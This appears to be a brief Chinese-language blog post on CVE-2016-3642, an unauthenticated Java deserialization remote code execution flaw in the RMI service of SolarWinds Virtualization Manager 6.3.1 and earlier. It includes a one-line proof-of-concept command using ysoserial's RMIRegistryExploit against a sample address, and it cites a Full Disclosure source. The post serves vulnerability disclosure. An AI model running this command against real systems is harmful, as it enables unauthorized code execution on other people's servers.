AD

Solarwinds_Virtualization_Manager远程命令执行

概述

       Solarwinds Virtualization Manager 6.3.1及以前版本的RMI服务存在JAVA反序列化漏洞(CVE-2016-3642),该服务监听1099段口。攻击者无需通过认证即可利用该漏洞,远程执行任意代码。

POC

       可以利用ysoserial在存在漏洞的设备上执行任意代码:
       java -cp ysoserial-0.0.2-all.jar ysoserial.RMIRegistryExploit 10.10.10.10 1099 CommonsCollections1 'whomai'

其他


       来自:http://seclists.org/fulldisclosure/2016/Jun/29?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+seclists%2FFullDisclosure+%28Full+Disclosure%29

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce